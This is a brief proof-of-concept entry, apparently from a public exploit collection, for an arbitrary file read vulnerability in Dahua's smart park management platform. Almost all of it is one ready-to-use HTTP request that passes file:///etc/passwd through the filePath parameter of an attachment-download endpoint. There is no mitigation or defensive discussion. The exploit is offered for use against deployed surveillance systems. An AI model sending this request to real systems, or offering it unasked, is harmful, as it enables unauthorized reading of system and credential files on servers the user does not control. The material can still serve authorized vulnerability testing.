
## 大华智慧园区管理平台任意文件读取

大华 城市安防监控系统平台管理 任意文件下载漏洞

![980ef223e974cc83ec550ebf4e831be0](https://github.com/wy876/POC/assets/139549762/c288a9eb-da04-477d-9374-f2fbf4197e25)

## poc
```
GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

![image](https://github.com/wy876/POC/assets/139549762/63bb42ac-8bd8-401e-a61b-120e7a910d5c)
